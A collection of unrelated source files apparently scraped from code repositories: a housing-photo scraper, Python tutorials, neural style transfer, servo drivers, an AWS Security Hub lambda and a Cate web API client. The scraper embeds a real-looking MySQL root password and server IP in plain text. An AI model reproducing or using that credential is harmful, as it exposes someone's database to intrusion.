return False, loc + 2
deploy_machine.register_action(3, custom_read)
deploy_machine.register_action(4, custom_write)
for pos in test_pos:
point.set(pos)
deploy_machine.reset_machine()
work_code(inp, deploy_machine)
return ret
def main():
aff_points = get_affected_pos(INPUT, my_machine,
(Point(x[0], x[1]) for x in get_all_combs(0, 49, length=2, just_once=False)))
custom_printer("A1")
custom_printer(f"Affected points {len(aff_points)}: {', '.join(str(x) for x in aff_points)}")
|
991,415 | 6176bddc84b89b27a561db0c83faa9280d9f890a | import pandas as pd
from sqlalchemy import create_engine
from util.scrawl import *
import os
def repay():
engine = create_engine('mysql+pymysql://root:gkd123,.@47.101.44.55:3306/Houseprice?charset=utf8', encoding='utf-8')
df = pd.read_sql('select * from infodata', engine)
cc = 0
for index, row in df.iterrows():
cc += 1
if cc < 14668:
continue
print(cc)
url = row['url'].replace('xiangqing', 'xiangce')
html = getHTML(url)
count = 0
while True:
count += 1
try:
type = html.xpath('/html/body/div[2]/div[1]/div/div[{0}]/h4/a/text()'.format(count))[0].split('(')[0]
pics = html.xpath('/html/body/div[2]/div[1]/div/div[{0}]/ul/li/a/img/@src'.format(count))
except:
break
if 'VR' not in type:
with open('test.txt', 'a+', encoding='utf-8') as f:
for pic in pics:
f.write(str(cc) + ',' + row['url'] + ',' + type + ',' + pic + '\n')
else:
continue
def clean():
count = 0
with open('test.txt', 'r', encoding='utf-8') as f:
data = f.read().split('\n')
for item in data:
pic = item.split('https://ke-image.ljcdn.com/')[-1].split('!')[0]
num = item.split(',')[0]
url = item.split(',')[1]
type_ = item.split(',')[2]
with open(os.getcwd() + '/tosql.sql', 'a+', encoding='utf-8') as t:
t.write("INSERT INTO `loupan_pic` VALUES ('{0}','{1}','{2}','{3}');".format(num, url, type_, pic))
t.write('\n')
count += 1
print(count)
pass
if __name__ == '__main__':
# repay()
clean()
|
991,416 | 5c738e0743d4960ebbefb62c4b405691136ed54c | #To add elements to a set using- add()
#Initially colors is an empty set
colors = set()
print(colors) #set()
colors.add('blue')
colors.add('red')
colors.add('white')
print(colors) #{'blue', 'red', 'white'}
#Sets are designed in such a way that you cannot add mutables as an element in sets
newColors = ['green', 'yellow', 'purple']
#Since, list is mutable type, you cannot add whole list as an element to a set
"""
colors.add(newColors)
TypeError: unhashable type: 'list'
"""
#So, you cannot add mutables like list, dictionary as an element in set
#But we can add immutables like string, tuples, numbers, floats as an element in set
colors.add(('green', 'yellow', 'cyan'))
print(colors) #{'blue', 'red', 'white', ('green', 'yellow', 'cyan')}
#4th element in colors is a tuple
#clear() - remove all elements from the set
colors.clear()
print(colors) #set()
colors = {'red', 'blue', 'green', 'black', 'pink'}
#pop() - removes & returns an arbitary element from set, if set if empty it raises KeyError
print(colors.pop()) #pink
print(colors.pop()) #blue
colors = set()
"""
print(colors.pop())
KeyError: 'pop from an empty set'
"""
#discard(e) - element e will be removed from set, if e is not present in set, nothing will be done
colors = {'red', 'blue', 'green', 'black', 'pink'}
colors.discard('blue')
colors.discard('white')
colors.discard('pink')
print(colors) #{'black', 'green', 'red'}
#remove(e) - works just like discard, but if e element is not present in set, it raises KeyError
colors = {'black', 'green', 'red'}
colors.remove('black')
print(colors) #{'red', 'green'}
"""
colors.remove('defi')
KeyError: 'defi'
"""
|
991,417 | 90c3d457c3a902d7dd2077b46f17985f156a67bc | import vgg
import numpy as np
import tensorflow as tf
import cv2
import os
import wrapper
from functools import reduce
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
def gram_matrix(matrix):
return np.matmul(matrix.T,matrix)/matrix.size
content_layers = ('relu3_2','relu4_2', 'relu5_2')
style_layers = ('relu1_1', 'relu2_1', 'relu3_1', 'relu4_1', 'relu5_1')
weight_path = "imagenet-vgg-verydeep-19.mat"
content_instance_path = 'content.jpg'
style_instance_path = 'style.jpg'
style_weight = 100000000000
total_variance_weight = 10000
vgg_weight,vgg_mean_pixel = vgg.load_net(weight_path)
content_instance = cv2.imread(content_instance_path)
content_shape = (1,) + content_instance.shape
content = tf.placeholder(shape=content_shape,dtype=tf.float32,name='content')
style_instance = cv2.imread(style_instance_path)
style_shape = (1,) + style_instance.shape
style = tf.placeholder(shape=style_shape,dtype=tf.float32,name='style')
content_feature = {}
style_feature = {}
@wrapper.run_time_record("Calculated content feature successfully!")
def calculate_content_feature():
with tf.Session():
VGG_net = vgg.net_preloaded(weights=vgg_weight, input_image=content, pooling='max')
content_preprocess = np.array(content_instance) / 256
for layer in content_layers:
content_feature[layer] = VGG_net[layer].eval(feed_dict={content:np.reshape(content_preprocess,content_shape)})
@wrapper.run_time_record("Calculated style feature successfully!")
def calculate_style_feature():
with tf.Session():
VGG_net = vgg.net_preloaded(weights=vgg_weight,input_image=style,pooling='max')
style_preprocess = np.array(style_instance) / 256
for layer in style_layers:
feature = VGG_net[layer].eval(feed_dict={style:np.reshape(style_preprocess,style_shape)})
style_feature[layer] = gram_matrix(np.reshape(feature,[feature.shape[1]*feature.shape[2],feature.shape[3]]))
def generate_image(start_rate,decay_steps,end_step,export_period,beta1,beta2,epsilon):
with tf.Graph().as_default() as g:
image_shape = content_shape
image = tf.Variable(tf.random_normal(mean=0, stddev=0.2, shape=image_shape), name='image',dtype=tf.float32)
VGG_net = vgg.net_preloaded(weights=vgg_weight,input_image=image,pooling='max')
content_loss = 0
style_loss = 0
alpha = np.full(len(content_feature),1/len(content_feature))
beta = np.full(fill_value=1/len(style_feature),shape=len(style_feature))
for i,layer in enumerate(content_layers):
content_loss += alpha[i] * tf.losses.mean_squared_error(VGG_net[layer],content_feature[layer])
for i,layer in enumerate(style_layers):
current_layer = VGG_net[layer]
feature = tf.reshape(current_layer,[current_layer.shape[1]*current_layer.shape[2],current_layer.shape[3]])
feature = tf.matmul(tf.transpose(feature),feature)
feature = feature / reduce(lambda x,y:x*y,current_layer.shape.as_list())
style_loss += style_weight * beta[i] * tf.losses.mean_squared_error(feature,style_feature[layer])
total_variance_loss = total_variance_weight * (tf.nn.l2_loss(image[:,1:,:,:]-image[:,:image_shape[1]-1,:,:]) + tf.nn.l2_loss(image[:,:,1:,:]-image[:,:,:image_shape[2]-1,:]))
loss = content_loss + style_loss + total_variance_loss
global_step = tf.Variable(0)
learning_rate = tf.train.exponential_decay(start_rate, global_step, decay_steps=decay_steps, decay_rate=0.98,staircase=True)
train_step = tf.train.AdamOptimizer(learning_rate=learning_rate,beta1=beta1,beta2=beta2,epsilon=epsilon).minimize(loss,global_step=global_step)
with tf.Session(graph=g) as session:
session.run(tf.global_variables_initializer())
session.run(image.assign(np.reshape(content_instance,content_shape)/256))
for i in range(end_step+1):
if not i % export_period:
image_instance = np.array(image.eval()*256)
image_instance = np.reshape(np.array(np.clip(np.round(image_instance,0),0,255),dtype=int),newshape=[content_shape[1],content_shape[2],content_shape[3]])
cv2.imwrite("step_"+str(i)+".jpg",image_instance,[int(cv2.IMWRITE_JPEG_QUALITY), 100])
wrapper.run_time_record("step " + str(i) + ": loss " + str(loss.eval())
+ " |content loss " + str(content_loss.eval())
+ " |style loss " + str(style_loss.eval())
+ " |tv loss " + str(total_variance_loss.eval())
+ " |rate " + str(learning_rate.eval()))(train_step.run)(session=session)
calculate_content_feature()
calculate_style_feature()
generate_image(start_rate=0.007,decay_steps=1000,end_step=3000,export_period=2,beta1=0.9,beta2=0.999,epsilon=10e-8)
|
991,418 | af039bcd7cffec5e8ab7b598bd7a01ab52338848 | print("hello world")
# comment : 메모 적어두는 곳
# variables : 변수 = "변하는 수"
identity = 'pencil'
print('I want to write it by',identity,'.')
# 변수의 종류는 크게 두 가지 있음: 숫자와 문자열 변수로 나뉨. 이걸 변수의 data type이라고 함. 정수와 실수, 문자열 data type이라고 함. int, double (or float), string
a = 5
b = 1.1
c = 'hello'
# 숫자 변수는 사칙연산이 가능, 문자 변수는 불가능
a = a+1
b = b+1.9
# c = c+1
# print(a)
# print(b)
# print(c)
a = (a-3)*3/9
print(a)
d = 'world'
print(c,d)
# 데이터타입별 초기화 방법
a = 0
b = 0.0
c = ''
# 제곱, 나머지, 몫
a = 2
a = a ** 5
b = 5
b = b % a
c = 10
c = c // 2
print(a)
print(b)
print(c)
a = '1'
b = '1'
a = a + b
print(a)
# 문자열 3종류
string1 = 'hello kim'
string2 = "hello 'kim'"
string3 = """ "hello" 'kim'
!
"""
print(string1)
print(string2)
print(string3)
# print의 출력형식(format) 3가지
number = 20
name = 'Mr. Kim'
base = 'Welcome, {}. Your room # is {}'
print('Welcome,',name,'. Your room # is',number)
print(base.format(name,number))
print('Welcome, {}. Your room # is {}'.format(name,number))
# casting : 데이터타입을 바꾸는 것
# int : 정수, string : 문자열, float : 실수
a = 1.1
b = 1
c = a + b
c = int(c)
print(c)
c = 2
c = float(c)
print(c)
# datatype
"""
int(integer) 정수 a = 0
float 실수 a = 0.0
string 문자열 a = ''
list 리스트 a = []
dict(dictionary) 딕셔너리 a = {}
bool(boolean) 0,[],Noneは(false)になります。その以外は全部(true)になります。
"""
a = bool(0) #False
b = bool(3.3) #True
c = bool([]) #False
d = bool(None) #False
print(a, b, c, d)
# datatype print
list = [1, 2, 3]
dict = {"pen": 100, "pencilcase": 300}
tuple = (1, 2, 3)
number = 10
real_number = 3.141592
print(type(list))
print(type(dict))
print(type(tuple))
print(type(number))
print(type(real_number))
|
991,419 | 38d8f397a82b278fd1d22d6a80f26c3fe7e8b0bf | from dynamixel_sdk.port_handler import *
from dynamixel_sdk.packet_handler import *
from colors import *
class ModelFlag:
def __init__(self, address, data_length):
self.address = address
self.data_length = data_length
class Dynamixel:
protocol_versions = [1.0, 2.0]
models = {
# MX series
311: {
"Return_Delay_Time": ModelFlag(9, 1),
"Drive_Mode": ModelFlag(10, 1),
"Operating_Mode": ModelFlag(11, 1),
"Shadow_ID": ModelFlag(12, 1),
"Velocity_Limit": ModelFlag(44, 4),
"Max_Position": ModelFlag(48, 4),
"Min_Position": ModelFlag(52, 4),
"Shutdown": ModelFlag(63, 1),
"Torque_Enabled": ModelFlag(64, 1),
"Profile_Acceleration": ModelFlag(108, 4),
"Profile_Velocity": ModelFlag(112, 4),
"Goal_Position": ModelFlag(116, 4),
"Moving": ModelFlag(122, 1),
"Present_Current": ModelFlag(126, 2),
"Present_Velocity": ModelFlag(128, 4),
"Present_Position": ModelFlag(132, 4),
"Velocity_Trajectory": ModelFlag(136, 4)
},
# AX series
12: {
"Return_Delay_Time": ModelFlag(5, 1),
"Min_Position": ModelFlag(6, 2),
"Max_Position": ModelFlag(8, 2),
"Max_Torque": ModelFlag(14, 2),
"Shutdown": ModelFlag(18, 1),
"Torque_Enabled": ModelFlag(24, 1),
"Goal_Position": ModelFlag(30, 2),
"Torque_Limit": ModelFlag(34, 2),
"Present_Position": ModelFlag(36, 2),
"Present_Velocity": ModelFlag(38, 2),
"Present_Load": ModelFlag(40, 2),
"Moving": ModelFlag(46, 1),
}
}
angle_limits = {
311: {
"Max_Angle": 360.0,
"Max_Position": 4095,
"Min_Angle": 0.0,
"Min_Position": 0
},
12: {
"Max_Angle": 300.0,
"Max_Position": 1023,
"Min_Angle": 0.0,
"Min_Position": 0
}
}
def __init__(self, portHandler, id, protocol):
self.portHandler = portHandler
self.id = id
if protocol in Dynamixel.protocol_versions:
self.protocol = protocol
else:
print "Invalid protocol, using default"
self.protocol = Dynamixel.protocol_versions[-1]
self.packetHandler = PacketHandler(self.protocol)
# Ping dynamixel
dxl_model_number, dxl_comm_result, dxl_error = self.packetHandler.ping(
self.portHandler, self.id)
if dxl_comm_result != COMM_SUCCESS:
print "Error: %s" % self.packetHandler.getTxRxResult(
dxl_comm_result)
elif dxl_error != 0:
print "Error: %s" % self.packetHandler.getRxPacketError(dxl_error)
else:
model = "MX-64" if dxl_model_number == 311 else "AX-12"
if model == "MX-64":
printC(MX64)
elif model == "AX-12":
printC(AX12)
print "-> [ID:%03d]" % (self.id)
self.model = None
if dxl_model_number not in Dynamixel.models:
print 'Error: Model not configured. Using default model.'
self.model = Dynamixel.models[311]
else:
self.model = Dynamixel.models[dxl_model_number]
self.limits = None
if dxl_model_number not in Dynamixel.angle_limits:
print 'Error: Model not configured. Using default model.'
self.limits = Dynamixel.angle_limits[311]
else:
self.limits = Dynamixel.angle_limits[dxl_model_number]
self.goal_pos = 0
self.max_pos = self.limits["Max_Position"]
self.min_pos = self.limits["Min_Position"]
def updateMaxPositions(self):
print("ID %i -> " % self.id),
pos, result = self.read("Max_Position")
if result:
self.max_pos = pos
else:
printC(WARNING, "Could not read max position, using default one")
pos, result = self.read("Min_Position")
if result:
self.min_pos = pos
else:
printC(WARNING, "Error: Could not read min position, using default one")
printC(RANGE, "%s %s" % (self.min_pos, self.max_pos))
def write(self, flag, value):
if flag not in self.model:
printC(ERROR, "Flag not specified. Options are:")
for key in self.model:
print "\t"+key
return False
port = self.portHandler
id = self.id
address = self.model[flag].address
data_length = self.model[flag].data_length
dxl_comm_result, dxl_error = (None, None)
if data_length == 1:
dxl_comm_result, dxl_error = self.packetHandler.write1ByteTxRx(
port, id, address, value)
elif data_length == 2:
dxl_comm_result, dxl_error = self.packetHandler.write2ByteTxRx(
port, id, address, value)
elif data_length == 4:
dxl_comm_result, dxl_error = self.packetHandler.write4ByteTxRx(
port, id, address, value)
else:
printC(ERROR, "Fatal: Undefined data length")
quit()
if dxl_comm_result != COMM_SUCCESS:
printC(WARNING, self.packetHandler.getTxRxResult(dxl_comm_result))
return False
elif dxl_error != 0:
printC(WARNING, self.packetHandler.getRxPacketError(dxl_error))
return False
return True
def read(self, flag):
if flag not in self.model:
print "Error: Flag not specified. Options are:"
for key in self.model:
print "\t"+key
return 0, False
port = self.portHandler
id = self.id
address = self.model[flag].address
data_length = self.model[flag].data_length
result, dxl_comm_result, dxl_error = (0, None, None)
if data_length == 1:
(result, dxl_comm_result, dxl_error) = self.packetHandler.read1ByteTxRx(
port, id, address)
elif data_length == 2:
(result, dxl_comm_result, dxl_error) = self.packetHandler.read2ByteTxRx(
port, id, address)
elif data_length == 4:
(result, dxl_comm_result, dxl_error) = self.packetHandler.read4ByteTxRx(
port, id, address)
else:
print "Fatal: Unsupported data length"
quit()
if dxl_comm_result != COMM_SUCCESS:
printC(WARNING, "%s" % self.packetHandler.getTxRxResult(
dxl_comm_result))
return 0, False
elif dxl_error != 0:
printC(WARNING, "%s" % self.packetHandler.getRxPacketError(
dxl_error))
return 0, False
return result, True
# Receives the position in degrees and converts to actual value
def writeAngle(self, angle):
max_angle = self.limits['Max_Angle']
min_angle = self.limits['Min_Angle']
max_position = self.limits['Max_Position']
min_position = self.limits['Min_Position']
if angle < min_angle or angle > max_angle:
print "Error: Angle out of range"
return False
# Convert angle to position
ratio = angle/(abs(max_angle - min_angle))
position = int(round(ratio*(abs(max_position-min_position))))
# Cap position to maximum position set on the dynamixel
if position > self.max_pos:
position = self.max_pos
elif position < self.min_pos:
position = self.min_pos
result = self.write("Goal_Position", position)
self.goal_pos = position
return result
def readAngle(self):
position, result = self.read("Present_Position")
if not result:
return 0.0, False
max_angle = self.limits['Max_Angle']
min_angle = self.limits['Min_Angle']
max_position = self.limits['Max_Position']
min_position = self.limits['Min_Position']
ratio = (1.0*position)/abs(max_position-min_position)
angle = ratio * max_angle
return angle, True
def readLoad(self):
if self.protocol == 2:
current, result = self.read("Present_Current")
if (current > 32768):
current = current - 65536
load = (1.1489*current - 0.172340426)*0.001
if not result:
return 0.0, False
elif self.protocol == 1:
load, result = self.read("Present_Load")
if not result:
return 0.0, False
return load, True
def readVelocity(self):
velocity, result = self.read("Present_Velocity")
if not result:
return 0.0, False
return velocity, True
def reachedGoal(self):
position, result = self.read("Present_Position")
if not result:
return True
return abs(position-self.goal_pos) <= 1
def isMoving(self):
return self.read("Moving")
|
991,420 | 98b75bc712ef8c65d8a67310e4083d7f4b502d1e | #
# Copyright (C) University College London, 2007-2012, all rights reserved.
#
# This file is part of HemeLB and is CONFIDENTIAL. You may not work
# with, install, use, duplicate, modify, redistribute or share this
# file, or any part thereof, other than as allowed by any agreement
# specifically made by you with University College London.
#
class Link(object):
# Type of boundary crossed by a link
no_boundary, wall, inlet, outlet = range(4)
def __init__(self, link_type, wall_distance=0, iolet_index=0):
self.link_type = link_type
# Distance to the boundary, as a fraction of the lattice vector
self.wall_distance = wall_distance
# Inlet/outlet index
self.iolet_index = iolet_index
|
991,421 | 8de4db3f673ee5d3a17bae14c9cac1d4e7810c76 | import numpy as np
import pandas as pd
from sklearn.pipeline import Pipeline
from sklearn.model_selection import GridSearchCV
import six
class MLModelPipeline:
def __init__(self, process_features, feature_selection, clf):
self.process_features = process_features
self.feature_selection = feature_selection
self.clf = clf
self.params = {}
def define_pipeline(self):
pipe = Pipeline([('process_features', self.process_features),('feature_selection', self.feature_selection),
('estimator', self.clf)])
return pipe
def set_params_feature_selection(self, **params_feature_selection):
if not params_feature_selection:
return self
for key, value in six.iteritems(params_feature_selection):
key_new = 'feature_selection__' + key
self.params.update({key_new:value})
return self
def set_params_estimator(self, **params_estimator):
if not params_estimator:
return self
for key, value in six.iteritems(params_estimator):
key_new = 'estimator__' + key
self.params.update({key_new:value})
return self
def get_best_estimator(self, score, X_train, y_train):
pipe = self.define_pipeline()
grid = GridSearchCV(estimator=pipe, param_grid=self.params, scoring=score)
print(self.params)
grid.fit(X_train, y_train)
return grid
|
991,422 | 528536c9c99a40a08783ef5f68b2a99a92da3aad | from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
import sys
import numpy as np
import parsebmp as pb
# Define method
def weight_variable(shape, name):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial, name=name)
def bias_variable(shape, name):
initial= tf.constant(0.1, shape=shape)
return tf.Variable(initial, name=name)
def conv2d(x, W):
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
def whatisit(file, sess):
print("File name is %s" % file)
data = pb.parse_bmp(file)
# Show bmp data
for i in range(len(data)):
sys.stdout.write(str(int(data[i])))
if (i+1) % 28 == 0:
print("")
# Predicting
d = np.array([data])
x_image = tf.reshape(d, [-1, 28, 28, 1])
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
h_pool1 = max_pool_2x2(h_conv1)
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
h_fc1_drop = tf.nn.dropout(h_fc1, 1.0)
y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
result = sess.run(y_conv)
# Show result
print(result)
print(np.argmax(result, 1))
if __name__ == "__main__":
# Restore parameters
W = tf.Variable(tf.zeros([28*28, 10]), name="W")
b = tf.Variable(tf.zeros([10]), name="b")
W_conv1 = weight_variable([5, 5, 1, 32], name="W_conv1")
b_conv1 = bias_variable([32], name="b_conv1")
W_conv2 = weight_variable([5, 5, 32, 64], name="W_conv2")
b_conv2 = bias_variable([64], name="b_conv2")
W_fc1 = weight_variable([7 * 7 * 64, 1024], name="W_fc1")
b_fc1 = bias_variable([1024], name="b_fc1")
W_fc2 = weight_variable([1024, 10], name="W_fc2")
b_fc2 = bias_variable([10], name="b_fc2")
sess = tf.InteractiveSession()
saver = tf.train.Saver()
saver.restore(sess, 'param/neural.param')
# My data
whatisit("My_data/0.bmp", sess)
whatisit("My_data/1.bmp", sess)
whatisit("My_data/2.bmp", sess)
whatisit("My_data/3.bmp", sess)
whatisit("My_data/4.bmp", sess)
whatisit("My_data/5.bmp", sess)
whatisit("My_data/6.bmp", sess)
whatisit("My_data/7.bmp", sess)
whatisit("My_data/8.bmp", sess)
whatisit("My_data/9.bmp", sess)
|
991,423 | 72c5a0e2ccee849db3dc473298e59067f622e535 | #-*- coding:utf-8 -*-
#!/usr/bin/env python
import os
import sys
import datetime
import logging
import enviroment
from daemon import run_daemon
from time import sleep
# 启动真正的运行进程
def start_server_in_subprocess():
import http.server as root_server
logging.info('server start.')
root_server.start_http_server()
sys.exit(2)
def start_server():
run_daemon()
try:
pid = os.fork()
except OSError, e:
logging.error('start http server is error.')
os._exit(1)
if pid == 0:
start_server_in_subprocess()
return
while pid:
# wait 任何一个子进程结束,都将触发该函数
ret = os.wait()
logging.error('Child process already stop, try to start')
try:
pid = os.fork()
if pid == 0:
start_server_in_subprocess()
return
except OSError, e:
logging.error('start http server is error.')
os._exit(1)
# 关闭所有进程
def stop_server():
processname = sys.argv[0] + ' start'
command = r'''ps -ef | grep "%s" | awk '{print $2}' | xargs kill -9''' % processname
logging.info('exe command:%s', command)
try:
logging.info('exit the http server')
ret = os.system(command)
except OSError, e:
logging.error('unknow error : %s',e)
# 入口函数,根据传入的参数做相关的操作
def entry():
if len(sys.argv) > 1:
op = sys.argv[1]
if op == 'start':
start_server()
elif op == 'restart':
stop_server()
# 因为关闭进程的函数是通过 程序名称+ start 来定位需要关闭的进程的,故在启动新的进程的时候,也应该复合相关的规则
command = "python %s start" % sys.argv[0]
os.system(command)
elif op == 'stop':
stop_server()
else:
logging.error('unknow commont:<%s>, you should write start|stop|restart .',op)
else:
logging.error('unknow commont, you should write start|stop|restart .')
if __name__ == '__main__':
entry() |
991,424 | 0d5e4bbe3f782f1bf1a8db2e2dcd24e0d7cd1467 | import traceback
import os
import boto3
from botocore.exceptions import ClientError # , EndpointConnectionError
def handleRecord(decoded_line):
send = False
cur_region = os.environ["AWS_REGION"]
try:
confirm = os.environ["CONFIRM_INSTANCES"]
except KeyError:
# Default to confirm the instance exists in the account (Non-MSSP)
confirm = "True"
if confirm.lower() != "false":
if "instance_id" in decoded_line:
region, instance = getInstance(decoded_line["instance_id"], decoded_line["detected_mac_address"])
try:
for iface in instance.network_interfaces:
decoded_line["vpc_id"] = instance.vpc_id
decoded_line["subnet_id"] = instance.subnet_id
decoded_line["image_id"] = instance.image_id
decoded_line["eni_id"] = iface.id
# Try and grab the instance name tag
try:
for tag in instance.tags:
if "name" in tag["Key"].lower():
decoded_line["instance_name"] = tag["Value"]
except (AttributeError, IndexError, KeyError):
decoded_line["instance_name"] = "Unnamed instance"
send = True
except ClientError:
# Not our instance
i_id = decoded_line["instance_id"]
mac = decoded_line["mac_address"]
e_msg = f"Instance {i_id} with MAC address {mac} not found in regions searched. Alert not processed."
send_result = {"Error": e_msg}
else:
e_msg = "Instance ID not provided. Alert not processed."
send_result = {"Error": e_msg}
else:
# We are not confirming instances, so we cannot identify it's region. Use our reporting region instead.
region = cur_region
send = True
if send:
send_result = sendToSecurityHub(generateManifest(decoded_line, cur_region, region), cur_region)
return send_result
def generateManifest(detection_event, region, det_region):
manifest = {}
if "gov" in region:
ARN = "arn:aws-us-gov:securityhub:{}:358431324613:product/crowdstrike/crowdstrike-falcon".format(region)
else:
ARN = "arn:aws:securityhub:{}:517716713836:product/crowdstrike/crowdstrike-falcon".format(region)
try:
manifest["SchemaVersion"] = "2018-10-08"
manifest["ProductArn"] = f"{ARN}"
accountID = boto3.client("sts").get_caller_identity().get('Account')
manifest["AwsAccountId"] = accountID
manifest["GeneratorId"] = detection_event["generator_id"]
manifest["Types"] = detection_event["types"]
manifest["CreatedAt"] = detection_event["created_at"]
manifest["UpdatedAt"] = detection_event["updated_at"]
manifest["RecordState"] = detection_event["record_state"]
severityProduct = detection_event["severity"]
severityNormalized = severityProduct * 20
manifest["Severity"] = {"Product": severityProduct, "Normalized": severityNormalized}
if "instance_id" in detection_event:
manifest["Id"] = detection_event["instance_id"] + detection_event["detection_id"]
manifest["Title"] = "Falcon Alert. Instance: %s" % detection_event["instance_id"]
manifest["Resources"] = [{"Type": "AwsEc2Instance", "Id": detection_event["instance_id"], "Region": det_region}]
else:
manifest["Id"] = f"UnknownInstanceID:{detection_event['detection_id']}"
manifest["Title"] = "Falcon Alert."
manifest["Resources"] = [{"Type": "Other",
"Id": f"UnknownInstanceID:{detection_event['detection_id']}",
"Region": region
}]
desc = f"{detection_event['description']}"
if "service_provider_account_id" in detection_event:
aws_id = f"| AWS Account for alerting instance: {detection_event['service_provider_account_id']}"
else:
aws_id = ""
description = f"{desc} {aws_id}"
manifest["Description"] = description
manifest["SourceUrl"] = detection_event["source_url"]
except Exception:
print("Could not translate info for event %s\n%s" % (detection_event["detection_id"], traceback.format_exc()))
return
try:
manifest["Types"] = ["Namespace: TTPs",
"Category: %s" % detection_event["tactic"],
"Classifier: %s" % detection_event["technique"]
]
except Exception:
pass
if "Process" in detection_event:
manifest["Process"] = detection_event["Process"]
if "Network" in detection_event:
manifest["Network"] = detection_event["Network"]
return manifest
def getInstance(instance_id, mac_address):
# Instance IDs are unique to the region, not the account, so we have to check them all
try:
regions = os.environ["REGIONS"].split(",")
except Exception: # Prolly a KeyError
ec2_client = boto3.client("ec2")
regions = [region["RegionName"] for region in ec2_client.describe_regions()["Regions"]]
for region in regions:
ec2 = boto3.resource("ec2", region_name=region)
try:
ec2instance = ec2.Instance(instance_id)
found = False
# Confirm the mac address matches
for iface in ec2instance.network_interfaces:
det_mac = mac_address.lower().replace(":", "").replace("-", "")
ins_mac = iface.mac_address.lower().replace(":", "").replace("-", "")
if det_mac == ins_mac:
found = True
if found:
break
else:
ec2instance = False
except ClientError:
# This is the wrong region for this instance
continue
except Exception:
# Something untoward has occurred, throw the error in the log
tb = traceback.format_exc()
print(str(tb))
continue
return region, ec2instance
def sendToSecurityHub(manifest, region):
client = boto3.client('securityhub', region_name=region)
check_response = {}
found = False
try:
check_response = client.get_findings(Filters={'Id': [{'Value': manifest["Id"], 'Comparison': 'EQUALS'}]})
for finding in check_response["Findings"]:
found = True
except Exception:
pass
import_response = {"message": "Finding already submitted to Security Hub. Alert not processed."}
if not found:
try:
import_response = client.batch_import_findings(Findings=[manifest])
except ClientError as err:
# Boto3 issue communicating with SH, throw the error in the log
print(str(err))
except Exception:
# Unknown error / issue, log the result
tb = traceback.format_exc()
print(str(tb))
return import_response
|
991,425 | 6b9c32517548ff907fc7dc4a70db3ddd55076c84 | def hello():
return "world"
def test_hello():
assert hello() == "world"
|
991,426 | 433915870ed0252c02209e2da7c846a80dfc9394 | # The MIT License (MIT)
# Copyright (c) 2018 by the ESA CCI Toolbox development team and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import json
import requests
import urllib.parse
import urllib.request
from typing import List, Tuple, Optional, Any, Union
from tornado import gen, ioloop, websocket
from cate.core.common import default_user_agent
from cate.conf.defaults import WEBAPI_WORKSPACE_TIMEOUT
from cate.conf.defaults import WEBAPI_RESOURCE_TIMEOUT
from cate.conf.defaults import WEBAPI_PLOT_TIMEOUT
from cate.core.workspace import Workspace, OpKwArgs
from cate.core.wsmanag import WorkspaceManager
from cate.util.misc import encode_url_path
from cate.util.monitor import Monitor
from cate.util.safe import safe_eval
from cate.util.web.serviceinfo import join_address_and_port
__author__ = "Norman Fomferra (Brockmann Consult GmbH)"
class WebAPIWorkspaceManager(WorkspaceManager):
"""
Implementation of the WorkspaceManager interface against
a WebSocket using a JSON RPC protocol.
It is currently used for the Cate CLI only.
"""
def __init__(self, service_info: dict, conn_timeout: float = 5, rpc_timeout: float = 120):
address = service_info.get('address', None) or 'localhost'
port = service_info.get('port', None)
if not port:
raise ValueError('missing "port" number in service_info argument')
self.base_url = f'http://{join_address_and_port(address, port)}'
self.ws_url = f'ws://{join_address_and_port(address, port)}/api'
self.ws_client = WebSocketClient(self.ws_url)
self.ws_client.connect(conn_timeout)
self.rpc_timeout = rpc_timeout
def _url(self, path_pattern: str, path_args: dict = None, query_args: dict = None) -> str:
return self.base_url + encode_url_path(path_pattern, path_args=path_args, query_args=query_args)
def _invoke_method(self, method, params, timeout: float = None,
monitor: Monitor = Monitor.NONE):
rpc_response = self.ws_client.invoke_method(method, params, timeout=timeout, monitor=monitor)
error_info = rpc_response.get('error')
if error_info:
WebAPIWorkspaceManager._raise_error(error_info)
return rpc_response.get('response')
def _fetch_json(self, url, data=None, timeout: float = None):
with requests.post(url,
data=data,
timeout=timeout or self.rpc_timeout,
headers={'User-Agent': default_user_agent()}) as response:
json_response = response.json()
status = json_response.get('status')
if status == 'error':
WebAPIWorkspaceManager._raise_error(json_response.get('error'))
return json_response.get('content')
@staticmethod
def _raise_error(error_info):
exc_type = None
if error_info:
message = error_info.get('message') or ''
error_ex_info = error_info.get('data')
if error_ex_info:
exc_type_name = error_ex_info.get('exception')
if exc_type_name:
# noinspection PyBroadException
try:
exc_type = safe_eval(exc_type_name)
except Exception:
pass
# TODO (forman): find out how can we preserve traceback without adding it to the message string
# tb = error_ex_info.get('traceback')
else:
message = 'Unknown error from WebAPI service.'
exc = None
if exc_type:
# noinspection PyBroadException
try:
